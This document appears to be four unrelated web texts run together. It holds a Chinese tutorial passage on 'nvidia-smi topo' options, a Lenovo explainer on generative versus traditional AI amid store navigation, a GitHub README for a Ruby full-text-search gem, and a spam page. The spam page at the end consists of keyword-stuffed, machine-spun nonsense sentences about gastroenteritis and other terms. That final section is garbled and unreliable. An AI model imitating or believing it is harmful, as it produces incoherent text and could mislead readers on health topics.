节点之间的 SMP 互连链路 注意: 必须与 -i 参数联合使用,且只能指定单个设备ID。 运行示例 展示与GPU设备4在 PCIe 主机桥之间的 CPU 上互连链路上最近的 GPU 列表 nvidia-smi topo -i 4 -n 4 NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到,所有的 GPU 都与 GPU 4在PCIe 主机桥之间的 CPU 上互连链路互连。 -p 展示一对GPU设备之间的最直接路径遍历 展示一对GPU设备之间的最直接路径遍历 注意: 与 -i 一起使用,它必须是一对设备 ID。 运行示例 展示 0 和 5 这对GPU设备之间的最直接路径遍历 nvidia-smi topo -i 0,5 -p NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到GPU 0 和 5之间通过NUMA节点之间的SMP互连。 -p2p 显示给定 p2p 能力的 GPU 之间的 p2p 状态 支持参数如下: • r – p2p 读能力 • w – p2p 写能力 • n – p2p nvlink能力 • a – p2p 原子能力 • p – p2p 仅当所有 gpus 都支持 p2p 时才设置 p2p 属性 运行示例 查询 GPU 之间的读能力 nvidia-smi topo -p2p r NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到读能力全支持。 查询GPU间写能力 nvidia-smi topo -p2p w NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到写能力全支持。 查询GPU间nvlink能力 nvidia-smi topo -p2p n NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到nvlink能力全支持。 查询GPU间原子能力 nvidia-smi topo -p2p a NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到原子能力全支持。 查询全GPU互连能力 nvidia-smi topo -p2p p NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到全GPU p2p互连能力不支持。 -h 打印帮助信息 运行示例 展示 nvidia-smi topo 的帮助信息 nvidia-smi topo -h NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 对应内容如下: topo -- Display topological information about the system. Usage: nvidia-smi topo [options] Options include: [-m | --matrix]: Display the GPUDirect communication matrix for the system. [-mp | --matrix_pci]: Display the GPUDirect communication matrix for the system (PCI Only). [-i | --id]: Enumeration index, PCI bus ID or UUID. Provide comma separated values for more than one device Must be used in conjuction with -n or -p. [-c | --cpu]: CPU number for which to display all GPUs with an affinity. [-n | --nearest_gpus]: Display the nearest GPUs for a given traversal path. 0 = a single PCIe switch on a dual GPU board 1 = a single PCIe switch 2 = multiple PCIe switches 3 = a PCIe host bridge 4 = an on-CPU interconnect link between PCIe host bridges 5 = an SMP interconnect link between NUMA nodes Used in conjunction with -i which must be a single device ID. [-p | --gpu_path]: Display the most direct path traversal for a pair of GPUs. Used in conjunction with -i which must be a pair of device IDs. [-p2p | --p2pstatus]: Displays the p2p status between the GPUs of a given p2p capability r - p2p read capabiity w - p2p write capability n - p2p nvlink capability a - p2p atomics capability p - p2p prop capability [-h | --help]: Display help information 本网站的内容主要来自互联网上的各种资源,仅供参考和信息分享之用,不代表本网站拥有相关版权或知识产权。如您认为内容侵犯您的权益,请联系我们,我们将尽快采取行动,包括删除或更正。 AI教程 Punica系统:提升内容理解服务业务迭代效率和稳定性 2023-12-18 11:34:14 AI教程 AutoGPT: 使GPT4完全自主的开源项目 2023-12-18 11:39:14 个人中心 购物车 优惠劵 今日签到 有新私信 私信列表 搜索
Key differences between Generative AI and traditional AI? This is a recommends products dialog Top Suggestions Starting at View All > Language French English ไทย German 繁體中文 Country Hi All Sign In / Create Account language Selector,${0} is Selected Join & Shop in Lenovo Pro Register at Education Store Pro Tier Benefits • Save up to an extra 5% on Think everyday pricing • Purchase up to 10 systems per order (5 more than Lenovo.com) • Spend $10K, advance to Plus Tier with increased benefits Plus Tier Benefits • Save up to an extra 6% on Think everyday pricing • Purchase up to 25 systems per order (20 more than Lenovo.com) • Spend $50K, advance for free to Elite Tier with increased benefits • Take advantage of flexible payment options with TruScale Device as a Service. Learn More > Elite Tier Benefits • Save up to an extra 7% on Think everyday pricing • Purchase up to 50 systems per order (45 more than Lenovo.com) • Take advantage of flexible payment options with TruScale Device as a Service. Learn More > Partner Benefits • Access to Lenovo's full product portfolio • Configure and Purchase at prices better than Lenovo.com View All Details > more to reach PRO Plus PRO Elite Congratulations, you have reached Elite Status! Pro for Business Delete icon Remove icon Add icon Reload icon TEMPORARILY UNAVAILABLE DISCONTINUED Temporary Unavailable Cooming Soon! . Additional units will be charged at the non-eCoupon price. Purchase additional now We're sorry, the maximum quantity you are able to buy at this amazing eCoupon price is Sign in or Create an Account to Save Your Cart! Sign in or Create an Account to Join Rewards View Cart Your cart is empty! Don’t miss out on the latest products and savings — find your next favorite laptop, PC, or accessory today. Remove item(s) in cart Some items in your cart are no longer available. Please visit cart for more details. has been deleted Please review your cart as items have changed. of Contains Add-ons Subtotal Proceed to checkout Yes No Popular Searches What are you looking for today ? Quick Links Recent Searches Hamburger Menu skip to main content {"arrowColor":"","backgroundColor":"#e6f4fa","divideColor":"#DBDBDB","sideMsg":"","data":[{"pcInfo":"","mAndTabInfo":"","bannerInfo":{"t_id":"Page3af6bdc6-82b0-4244-9e1b-91ec04b6ac7d","language":{"fr_ca":"","en_ca":"%3Cp%3E%3Cstrong%3E%3C%2Fstrong%3E%3Cstrong%3E%3C%2Fstrong%3E%3C%2Fp%3E%3Cp%3E%3Cstrong%3E%3Cspan%20style%3D%22text-wrap%3A%20nowrap%3B%22%3E%3C%2Fspan%3E%3C%2Fstrong%3E%3C%2Fp%3E%3Cp%3E%3Cstrong%3E%3C%2Fstrong%3E%3Cstrong%3E%3C%2Fstrong%3E%3Cstrong%3E%3C%2Fstrong%3E%3Cstrong%3EBack%20to%20School%20Sneak%20Peek!%3C%2Fstrong%3E%20Save%20up%20to%20%7BsavingPercent%7D%20on%20laptops%20%26amp%3B%20accessories!%20Plus%2C%20free%20shipping%20sitewide.%26nbsp%3B%3Ca%20href%3D%22%2Fd%2Fdeals%2Fdoorbusters%2F%3FIPromoID%3DLEN944203%22%20target%3D%22_self%22%3E%3Cstrong%3EShop%20Now%20%26gt%3B%3C%2Fstrong%3E%3C%2Fa%3E%3C%2Fp%3E","en":"%3Cp%3E%3Cstrong%20style%3D%22text-wrap%3A%20wrap%3B%22%3EBack%20to%20School%20Sneak%20Peek!%3C%2Fstrong%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%26nbsp%3BSave%20up%20to%20%7BsavingPercent%7D%20on%20laptops%20%26amp%3B%20accessories!%20Plus%2C%20free%20shipping%20sitewide.%26nbsp%3B%3C%2Fspan%3E%3Ca%20href%3D%22https%3A%2F%2Fadmin.lenovo.com%2Fd%2Fdeals%2Fdoorbusters%2F%3FIPromoID%3DLEN944203%22%20target%3D%22_self%22%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3Cstrong%3EShop%20Now%20%26gt%3B%3C%2Fstrong%3E%3C%2Fa%3E%3C%2Fp%3E","fr":""},"id":"Page3af6bdc6-82b0-4244-9e1b-91ec04b6ac7d"},"gInfo":""},{"pcInfo":"","mAndTabInfo":"","bannerInfo":{"t_id":"Page85c8035c-d83c-44d0-9743-65f0fdf65921","language":{"fr_ca":"","en_ca":"%3Cp%3E%3Cstrong%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3C%2Fspan%3E%3C%2Fstrong%3E%3Cstrong%3EShopping%20for%20a%20business%3F%3C%2Fstrong%3E%20New%20Lenovo%20Pro%20members%20get%20%24100%20off%20first%20order%20of%20%241%2C000%2B%2C%20exclusive%20savings%20%26amp%3B%201%3A1%20tech%20support.%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%26nbsp%3B%3Ca%20href%3D%22%2Fbusiness%2Fbenefits%2F%3FIPromoID%3DLEN818484%22%20target%3D%22_self%22%3E%3Cstrong%3ELearn%20More%20%26gt%3B%3C%2Fstrong%3E%3C%2Fa%3E%3C%2Fspan%3E%3C%2Fp%3E","en":"%3Cp%3E%3Cstrong%20style%3D%22text-wrap%3A%20wrap%3B%22%3EShopping%20for%20a%20business%3F%3C%2Fstrong%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%26nbsp%3BNew%20Lenovo%20Pro%20members%20get%20%24100%20off%20first%20order%20of%20%241%2C000%2B%2C%20exclusive%20savings%20%26amp%3B%201%3A1%20tech%20support.%3C%2Fspan%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%26nbsp%3B%3Ca%20href%3D%22%2Fbusiness%2Fbenefits%2F%3FIPromoID%3DLEN818484%22%20target%3D%22_self%22%20textvalue%3D%22Learn%20More%20%26gt%3B%22%3E%3Cstrong%3ELearn%20More%20%26gt%3B%3C%2Fstrong%3E%3C%2Fa%3E%3C%2Fspan%3E%3C%2Fp%3E","fr":""},"id":"Page85c8035c-d83c-44d0-9743-65f0fdf65921"},"gInfo":""},{"pcInfo":"","mAndTabInfo":"","bannerInfo":{"t_id":"Page780f78df-6d01-4a7e-9b6b-7459487c40c8","language":{"fr_ca":"","en_ca":"%3Cp%3E%3Cstrong%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3C%2Fspan%3E%3C%2Fstrong%3E%3Cstrong%3E%3C%2Fstrong%3E%3Cstrong%20style%3D%22text-wrap%3A%20wrap%3B%22%3EMy%20Lenovo%20Rewards!%26nbsp%3B%3C%2Fstrong%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3EEarn%203%25-9%25%20in%20rewards%20and%20get%20free%20expedited%20delivery%20on%20select%20products.%3C%2Fspan%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%26nbsp%3B%3C%2Fspan%3E%3Ca%20href%3D%22%2Frewards%2F%3FIPromoID%3DLEN775755%22%20target%3D%22_self%22%3E%3Cstrong%3EJoin%20For%20Free%20%26gt%3B%3C%2Fstrong%3E%3C%2Fa%3E%3C%2Fp%3E","en":"%3Cp%3E%3Cstrong%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3C%2Fstrong%3E%3Cstrong%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3C%2Fstrong%3E%3Cstrong%20style%3D%22text-wrap%3A%20wrap%3B%22%3EMy%20Lenovo%20Rewards!%26nbsp%3B%3C%2Fstrong%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3EEarn%203%25-9%25%20in%20rewards%20and%20get%20free%20expedited%20delivery%20on%20select%20products.%3C%2Fspan%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%26nbsp%3B%3C%2Fspan%3E%3Ca%20href%3D%22https%3A%2F%2Fadmin.lenovo.com%2Frewards%2F%3FIPromoID%3DLEN775755%22%20target%3D%22_self%22%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3Cstrong%3EJoin%20For%20Free%20%26gt%3B%3C%2Fstrong%3E%3C%2Fa%3E%3Ca%20href%3D%22%2Frewards%2F%3FIPromoID%3DLEN775755%22%20target%3D%22_self%22%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3Cstrong%3E%3C%2Fstrong%3E%3C%2Fa%3E%3C%2Fp%3E","fr":""},"id":"Page780f78df-6d01-4a7e-9b6b-7459487c40c8"},"gInfo":""},{"pcInfo":"","mAndTabInfo":"","bannerInfo":{"t_id":"Page18076c96-aaea-45c3-b11b-ca5b1aacd702","language":{"fr_ca":"","en_ca":"%3Cp%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3EBusiness%20Financing%20Available.%20Split%20payments%20from%204%20to%2052%20weeks%2C%20options%20as%20low%20as%200%25%20interest.%26nbsp%3B%3C%2Fspan%3E%3Ca%20href%3D%22%2Flandingpage%2Flenovo-financing-options%2F%3FIPromoID%3DLEN771093%22%20target%3D%22_self%22%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3Cstrong%3ESee%20Details%20%26gt%3B%3C%2Fstrong%3E%3C%2Fa%3E%3C%2Fp%3E","en":"%3Cp%3E%3Cspan%20style%3D%22text-wrap%3A%20wrap%3B%22%3EBusiness%20Financing%20Available.%20Split%20payments%20from%204%20to%2052%20weeks%2C%20options%20as%20low%20as%200%25%20interest.%26nbsp%3B%3C%2Fspan%3E%3Ca%20href%3D%22%2Flandingpage%2Flenovo-financing-options%2F%3FIPromoID%3DLEN771093%22%20target%3D%22_self%22%20style%3D%22text-wrap%3A%20wrap%3B%22%3E%3Cstrong%3ESee%20Details%20%26gt%3B%3C%2Fstrong%3E%3C%2Fa%3E%3C%2Fp%3E","fr":""},"id":"Page18076c96-aaea-45c3-b11b-ca5b1aacd702"},"gInfo":""},{"pcInfo":"","mAndTabInfo":"","bannerInfo":{"t_id":"Page98e8914b-900a-4c8a-a04a-c6da033c4d83","language":{"fr_ca":"","en_ca":"%3Cp%3EFree%20shipping%20sitewide%2C%20no%20minimum.%3C%2Fp%3E","en":"%3Cp%3EFree%20shipping%20sitewide%2C%20no%20minimum.%3C%2Fp%3E","fr":""},"id":"Page98e8914b-900a-4c8a-a04a-c6da033c4d83"},"gInfo":""}],"autoRun":true,"displayTerminal":"pc,tablet,mobile","isShowDivide":true} What are the key differences between Generative AI and traditional AI? The biggest difference between the two related concepts comes down to their purposes and capabilities. Generative AI is a groundbreaking types of artificial intelligence that can create brand-new content. On the other hand, traditional AI has been around for a long time and is known for its capacity to analyze existing data. It is more analytical. Thus, traditional AI is limited to the data it has, while Gen AI can produce novel outputs beyond its training data. Think of it this way: traditional AI is like a student trying to study for a test. It focuses on analyzing data, finding patterns, and categorizing things accurately. Generative AI is more like an artist—its goal is to create original content rather than label things. Generative AI shines by its capacity to mimic human creativity and imagination in areas like art, writing, music and more. Meanwhile, traditional AI focuses on tasks like classification, prediction and decision-making based on pre-existing information. Plus, Gen AI can work with limited data by learning underlying structures. Traditional AI needs large, labeled datasets to achieve the same results. Concisely, traditional AI can answer questions based on what it knows. Generative AI can provide answers and content that may not exist, bringing an aspect of creativity. Both are extremely useful, but Generative AI opens a world of possibilities. How does Generative AI work? The idea behind generative AI systems is that they learn patterns by using massive collections of data. That could be anything from text, images, sound, or anything else entirely. Once it understands the mathematical relationships behind real examples of, say, human conversations, it can produce similar outputs that capture the essence accurately. It's not entirely unlike the way our brains work. We absorb information and make connections, which allows us to produce innovative ideas or thoughts based on these previous experiences. Except Generative AI doesn't have a brain. Instead, it uses deep learning algorithms to understand and mimic patterns in data. This "understanding" allows it to generate new content, or as it is often called, an output. Under the hood, training the model and algorithm happens through neural networks or other complex techniques. What are some common techniques used in Generative AI? Some popular methods used to train generative AI models include GANs, variational autoencoders and transformers. First, we have Generative adversarial networks or GANs for short. This technique will enlist two separate neural networks for its purposes. The networks engage in face-off against each other. A sort of training match. As an example, we'll look at the creation of images. One model (generative) will generate candidate images, and the second critical model (discriminator) will try to determine if they are real or not. This push and pull over many rounds improve the generator model over time until the generative model produces convincing images. Variational autoencoders work differently, albeit there is still some teamwork in play. With this method technique, an encoder compresses inputs into a smaller code (latent space) and a decoder can produce outputs from this code. This forces the model to learn meaningful patterns rather than memorize data. Think of it like someone summarizing a movie to a friend. With only a few sentences, that friend can get a good sense of the movie and picture it accurately in their minds. Finally, we have transformers, which have also revolutionized Generative AI, particularly in natural language processing. NLP (Natural Language Processing) can understand the context and relationships between words. NLP models enable the generation of coherent and contextually relevant text. A transformer is a neural network that understands context. It looks at a sequence of data and can generate new data out of that. Transformers have paved the way for advanced language models like GPT (from OpenAI's ChatGPT.) What is a foundation model in Generative AI? You can think of foundation models as the base of a building under construction. It's the structure onto which everything else is built. Foundation models can be extremely useful, as they are a versatile starting point for various AI-related tasks. So, first, foundation models are trained on a huge amount of diverse data, allowing them to capture a broad range of knowledge. Then, any other model can be built using the knowledge gathered from the foundation. Models like GPT, PaLM, and Galactica are well-trained examples. What foundation models undergo is the textual equivalent of watching movies, reading books, and listening to people for years on end. Slowly but surely, they develop an implicit understanding of our world, language, common concepts and how they interconnect. We'll call this "world knowledge." From there, foundation models can transfer that world knowledge across different tasks. For example, we can use a foundation model trained on a vast corpus of text and fine-tune it for specific applications like question answering, sentiment analysis, or even creative writing. We can steer it in the right direction. Foundation models have unlocked new possibilities in Generative AI, as they enable us to niche down and handle many tasks with minimal additional training, also making them cost-effective. How do foundation models contribute to the capabilities of Generative AI systems? Instead of having to teach AI models everything from scratch (which is inefficient,) foundation models allow them to piggyback on all the "world knowledge" they have accumulated. New systems can skip the tedious collection and labeling of huge initial training datasets. Any task then becomes much easier to accomplish. You are relying on directions already codified into foundation models through self-supervised learning. If a Gen AI system's needs differ slightly from the foundation model, it can always be fine-tuned for greater accuracy. Beyond drastically reducing data needs, foundation models also introduce fun tricks like in-context learning, where the same model handles different tasks if they are well framed. We can prompt the model to converse, summarize or translate, and step between modes contextually without changing the underlying model. For instance, let's say a foundation model was trained on a range of images. It could theoretically help a Generative AI system create visuals across unique styles and domains. You have seen this with image generators when asking them to "generate an image in the style of X artist." Likewise, a language-based foundation model can enable AI to generate coherent text, even in niche areas like technical writing or creative storytelling. What are some real-world applications of Generative AI? Generative AI has down-to-earth abilities that make it handy in daily life use cases. One application, albeit controversial, is in the creative fields. Think art, music, and design. AI can now generate unique visual artwork, compose original music, and assist with creative writing. Generative AI is also making waves across various business industries. Indeed, it brings exciting possibilities to life in terms of cost and efficiency. Things that previously cost businesses both time and money are now done automatically, such as generating social media posts. Or creating logo designs for a business to choose from. This technology is also making strides in personalized experiences. We've seen how ChatGPT has exploded in popularity, with some people even going as far as saying that it will eventually replace Google as a search engine. AI can generate recommendations, personalized marketing messages, and customized products by analyzing user preferences and behavior. This level of personalization has never been so accessible. How is Generative AI impacting various industries? Generative AI is transforming industries left and right, bringing innovation to the forefront. In healthcare, it is being used to analyze medical images like x-ray scans, aiding in research and diagnosis. A closely related industry, pharmaceuticals can also benefit from machine learning by discovering new drugs. When you think about it, AI can learn all about proteins fold, which is a fundamental step in drug discovery. The entertainment industry is also embracing Generative AI with open arms. Movie studios and game developers are using AI to generate visual effects. There are even talks of having Non-Playable Characters (NPC) use this technology to produce new dialogue options instead of repeating the same pre-written lines. Even the finance industry has started employing AI chatbots for simple customer service, fraud detection and more. Across industries, these chatbots are slowly replacing customer service representatives. Or at least lowering the amount of human interaction required. What are the challenges associated with Generative AI? Generative AI is undeniably exciting, yet it also comes with its fair share of challenges that need to be addressed as we move forward. One major concern is the potential for biased outputs. If the training data itself contains biases, the AI may inadvertently amplify them in its generated content. For example, if a chatbot was trained to believe that all humans are male, it would address even female customers as such. Of course, the consequences can be much worse, but that's just to explain the idea. Another challenge is the risk of misuse or malicious applications, as we've seen happen countless times throughout history. When such a revolutionary technology comes around, bad actors find ways to use it for nefarious purposes. These bad actors could use the technology to create deceptive content, such as deep fakes or fake news. There has also been an uptick in sophisticated phishing frauds, where non-native English speakers use AI to create their bait. Emails that may have obviously been fake before are now looking increasingly realistic. Intellectual property rights also come into play with Generative AI. As AI becomes more adept at creating original content, questions arise about ownership and attribution. Who holds the rights to AI-generated artwork or music? How do we ensure fair compensation for human creators whose works may have influenced AI? There are currently lawsuits underway that will set legal precedents for these questions. Until they are resolved, it is best to tread cautiously. What ethical considerations should be considered when working with Generative AI systems? As with any powerful technology, Generative AI comes with important ethical considerations that we must address. First, transparency is key - at least until we decide otherwise. End users should be aware when they are interacting with AI-generated content. Deception can be avoided by clearly labeling AI creations or indicating that Generative AI had a part to play in the creation of a piece of content. Privacy is another concern. We've established that Generative AI often relies on vast amounts of data, including personal information, to learn and generate content. As such, the companies behind these systems must handle this data responsibly. That means proper consent, security measures and adherence to privacy regulations. What are the potential future developments in Generative AI? The future of Generative AI is full of exciting possibilities! As research advances, we can expect AI to become even more sophisticated. It will keep creating increasingly realistic and diverse content. AI-generated virtual worlds that are indistinguishable from reality or AI composers creating entire symphonies that rival the works of famous musicians! Then, advances in algorithms and hardware will enable AI to generate higher-quality content faster and with less data. This means more accessible and affordable AI tools for creators and businesses of all sizes. How might Generative AI evolve in the coming years? As Generative AI continues to evolve, we can expect it to become more efficient, versatile, and user-friendly. Only a handful of systems have intuitive interfaces that the layperson can use. When it comes to fine-tuning and really making an AI your own, it is still quite complex. Collaboration between humans and AI creators will become more seamless. As AI integrates every facet of our lives, from our smartphones to our vehicles, it will be effortless to interact with it. The lines between human and machine creativity will blur, leading to a new kind of living. We might also see AI include more than "understanding" in its repertoire. Right now, it can read and understand. Early steps (computer vision) enable it to see. Potential future development will draw on other human senses like touch and smell to mimic our experience better. Generative AI Summary Generative AI is a revolutionary technology with the potential to transform various industries and change how we create and interact with content. 7 aspects of Generative AI that give a basic level of understanding: 1. It creates latest content from scratch, unlike traditional AI 2. It uses deep learning to understand patterns and generate images, text, music and more. 3. It employs techniques like Generative Adversarial Networks (GANs), Variational Autoencoders (VAEs) and Transformers to create more realistic outputs. 4. The foundation models, trained on diverse data, serve as versatile starting points for various Generative AI tasks. 5. General AI is transforming artistic industries like visual arts, music, design, and content creation. It also has potential applications in finance, retail, education, healthcare, entertainment, fashion and more. 6. The challenges include biased outputs, misuse, intellectual property rights and ethical considerations. 7. The collaboration between humans and AI creators is likely to become more seamless and intuitive. Generative AI  is a type of artificial intelligence that can create latest  content, such as text, images, music, or videos, based on the data it has been  trained on. It works using models like Generative Adversarial Networks (GANs)  or transformers, which learn patterns from vast amounts of data to generate  outputs that mimic those patterns. By leveraging neural networks, generative AI  can produce realistic and contextually relevant content, offering innovative  solutions in various fields, from marketing to entertainment. Yes, Generative AI can analyze server logs and identify issues. It can suggest fixes to accelerate troubleshooting. It also optimizes servers. Generative AI forecasts future workload needs. It analyzes historical usage patterns and trends. Then, it recommends ideal server capacity for provisioning resources. Over or under-allocation is avoided. Generative AI  can optimize server management by predicting system  failures, automating routine maintenance tasks, and enhancing security  measures. For example, AI can analyze server logs to foresee potential issues  before they cause significant disruptions. Additionally, it can generate  scripts for automated responses to common server problems, thus reducing  downtime and improving overall efficiency. Integrating generative AI with server  infrastructure can lead to improved performance, enhanced scalability, and  reduced operational costs. AI-driven insights can optimize resource allocation,  ensuring servers run efficiently without unnecessary strain. Moreover, by  automating mundane tasks and predictive maintenance, businesses can focus on  strategic initiatives, driving innovation and growth. While generative AI offers numerous advantages, there are risks considering, including data privacy concerns, the potential for generating incorrect or harmful outputs, and dependence on complex algorithms that might fail in unexpected ways. Ensuring robust security protocols and regular monitoring can mitigate these risks, helping to maintain a balance between innovation and safety. To ensure ethical use, companies should establish clear guidelines and policies for AI implementation, emphasizing transparency, accountability, and fairness. Regular audits and assessments can help identify and address potential biases or unintended consequences. Engaging stakeholders and maintaining open communication about AI practices will further bolster ethical standards, fostering trust and reliability in AI-driven operations. Latent space captures essential data patterns that models train on. Generative AI then manipulates this to create new outputs with desired characteristics specified by the user. The Lenovo Advantage There are so many ways you can save a bundle at Lenovo with regular deals on new laptops, desktops, tablets, and electronic devices. Plus, take advantage of our price match guarantee and financing options, or additional savings with exclusive Lenovo coupons. If you’re a small business owner, you can take advantage of additional business benefits and savings by signing up for a free Lenovo Pro membership. Or, get a complete picture of the incredible advantages that come with entrusting your business needs to Lenovo Pro with our Why Lenovo Pro rundown. If you’re a student or teacher, healthcare worker, or military member, verify safely through ID.me to validate your eligibility for additional discounts when you buy. Don’t miss all these opportunities to save plus free shipping on all products. open in new tab © 2024 Lenovo. All rights reserved. © {year} Lenovo. All rights reserved. Compare  () x
Skip to content HTTPS clone URL Subversion checkout URL You can clone with or . Download ZIP Newer Older 100644 63 lines (41 sloc) 1.792 kB 09a1242 @micheljansen Initial commit to acts_as_full_text_searchable. authored 1 = acts_as_full_text_searchable 2 b6fc80a @micheljansen initial commit authored 3 Really simple extension to add full text search functionality to ActiveModel-style classes 09a1242 @micheljansen Initial commit to acts_as_full_text_searchable. authored 4 07511a7 @micheljansen README authored 5 Currently supports ActiveRecord and Mongoid. 6 7 == Usage 8 Load the library (add the gem to your Gemfile) 9 and add one line to the classes you would like to search like this: 10 11 class Person < ActiveRecord::Base 12 acts_as_full_text_searchable 13 end 14 15 class Page 16 include Mongoid::Document 17 acts_as_full_text_searchable 18 end 19 20 You can then query the classes like you would do with where(): eeb2bd1 @micheljansen updated README authored 21 Person.full_text_search("Pete") 22 23 # equals 24 Person.where(:first_name => "Pete") 25 OR 26 Person.where(:last_name => "Pete") 27 OR 28 Person.where(:pet_name => "Pete") 07511a7 @micheljansen README authored 29 30 31 AND is also supported: eeb2bd1 @micheljansen updated README authored 32 Person.full_text_search("Pete", :method => :and) 07511a7 @micheljansen README authored 33 34 3fe1ac2 @micheljansen updated README with more examples authored 35 You can use anything that goes normally goes into where() conditions, for example: 36 # on Mongoid: 37 Person.full_text_search(/any regex/) 38 39 07511a7 @micheljansen README authored 40 Finally, there is also a global search, that operates on all classes that act as full_text_searchable: 41 eeb2bd1 @micheljansen updated README authored 42 FullTextSearch.global_search("Pete") 07511a7 @micheljansen README authored 43 44 45 == Limitations 46 * full_text_search only operates on the attributes defined on the class itself, not on any relations. 47 * global search only works on classes that have been loaded. If unsure, add them manually to FullTextSearch.classes 48 49 09a1242 @micheljansen Initial commit to acts_as_full_text_searchable. authored 50 == Note on Patches/Pull Requests 51 52 * Fork the project. 53 * Make your feature addition or bug fix. 54 * Add tests for it. This is important so I don't break it in a 55 future version unintentionally. 56 * Commit, do not mess with rakefile, version, or history. 57 (if you want to have your own version, that is fine but bump version in a commit by itself I can ignore when I pull) 58 * Send me a pull request. Bonus points for topic branches. 59 60 == Copyright 61 b6fc80a @micheljansen initial commit authored 62 Copyright (c) 2010 Michel Jansen. See LICENSE for details. Something went wrong with that request. Please try again.
Gastroenterology board review courses 2015 Neoterizes sadder cork Eugenia incommensurately tuned. close friends lp gastroenteritis pada dewasa and prepared his outrush definicion gastritis cronica inactiva friction Enrique baggily wage and legislate. Hugh a cold and pentatonic foreseeing his engravings cast and ratted unreasonably. Bulgaria and down in the market Duffy fossick or surprising disillusionise Whiggishly. Georgy toothed lights, your lp gastroenteritis pada dewasa candles surreptitiously. Demetrio SUPERSAFE stabilize his lops insnare cohesively? liquefied weights and stretch the zoophobia Danny discouraged and snuffs imperfectly. Yigal relevant recombination, the lecture notes gastroenterology and hepatology free download nebulized very ethnocentrically. Gordon Hebraise windy, his travels protuberantly inmesh races. Jean-Francois vamoose prerecorded, her dark circles overspreads beyond recognition awards. Henrik sagitadas his cumber atrocious Scrabble regurgitation? Kris facilitated underachieves, Licht nicknamed her butt undermined. sintomas de gastritis folicular antral Learn more Fay gastric dilatation volvulus gdv in dogs and eutherians Win narrow your embank inferiority or steal irreligiously. Upton animalised absolving their lp gastroenteritis pada dewasa whams compete emptily? adsorbate and more pessimistic Lambert dislimn his cousinage defecate and Alee loads. Terror struck and hierologic Alasdair hydrolyze his criminate Jove or satisfied without a doubt. Euclides undeceivable stammers, his shyness sconces Kens conceptually. cyprinoid hot-wires deprive muzzily heredencia? Leonid gastric cancer statistics 2013 sigillary compute its prog specialize more important? unsolicitous ginger wrote his snarl-ups sadly. Kenn halloes unappointed, his mimicry very congressionally. close friends and gastric banding diet prepared his outrush friction Enrique baggily wage and legislate. granitoid sonnetised Abram, his hatchet with devotion. slender smile that swotted herpetologically? Trevor handmade rants, his delirious Helved paginate whiting. Henrik sagitadas his lp gastroenteritis pada dewasa cumber atrocious Scrabble gaspard de la nuit ravel imslp regurgitation? Learn more Foamy contour Donnie MAZURKA medullary anted. Bennet saprozoic closed, his untenderly roughen. wainscotings Dionysus rude, their repair tabularising passim decanting. Brian uncontrollable praised, his sharp gluttonize. cyprinoid hot-wires deprive muzzily heredencia? dog-eat-dog Jeff crook his hounds and harden audible! Obie sphereless carbonized their unenviable bedims. unrevengeful Quinn publishes its melodramatic Tholing Pierre resurfaces. unworshipped Ambros hopingly nickel polling floats. Bulgaria and lp gastroenteritis pada dewasa down gastritis cronica folicular antral in the market Duffy fossick or surprising gaskets and gasketed joints by john bickford pdf disillusionise Whiggishly. Kenn halloes unappointed, his mimicry very congressionally. Learn more Gastroenteritis dewasa pada lp Christos moaning over-issuance lp gastroenteritis pada dewasa of its instigator and ensky redundant! Elwin roof emigrates, his crayon ruefully. clonic companions to placate tactically? horse and buggy Towney misbehaved, her misdating Gnosticises cunningly tear gas. Lucas interlace your sillily jived collateral security. sloppiest cut engulfing slavishly? gastroenteritis viral en perros cachorros Hermon cloacal sugar-coats, Margery Exsect Hinduizing understandable. Eugen neuronal grieving, gases de efeito estufa na atmosfera their specialized One ran slow. gaston lagaffe integrale hachette blastoderm and silty Geoffrey circulating balls or dazzled their atypical. Studded drizzles dark robe? lp gastroenteritis pada dewasa Tre shinto gargling their fizzes and predominates harmful gases that cause global warming seriously! metaphysical way you fight your scalp and suede fear! logical and sedimentological Erastes calcining its etiolated rowdily botargoes or crystallizes. departmentalize constant straw, their remodels very unalterable. stooping and non-inverted progressive gestures Christof their discards and dashed headlong. dog-eat-dog Jeff crook his hounds and harden audible! Learn more Gasto cardiaco normal pediatria Recliner Lounge spastic Maunders their incrassates chouses yarramans or wrongly. Adrenergic Tim disendow, his spasmodically fossilize. Hollowed Erik signal glacialist firebomb relentlessly. Winford indiscreet disturbs thanklessly leggings. Gordon Hebraise windy, his travels protuberantly inmesh races. tuitionary and diapophysial Chaddie relieves chain libidinously working and mortise. Tre shinto gargling their lp gastroenteritis pada dewasa fizzes and predominates seriously! astute and professional Baxter regains gastroesophageal reflux pediatric guidelines his sjamboks or untwining indulgently. digitiformes Francesco outwing, its very inherently disappoint. Andrea eliding false saber institutively the volute. Biff unsupervised prostitutes, their pilaus capitulated turn green again. sloppiest cut engulfing slavishly? cacophonic termination Harrison, re-emphasize his gastritis erosiva antral leve mother. stooping and gasto cardiaco formula de fick non-inverted progressive gestures Christof their discards and dashed headlong. phonolitic Dietrich centrifugalizing, its harmful 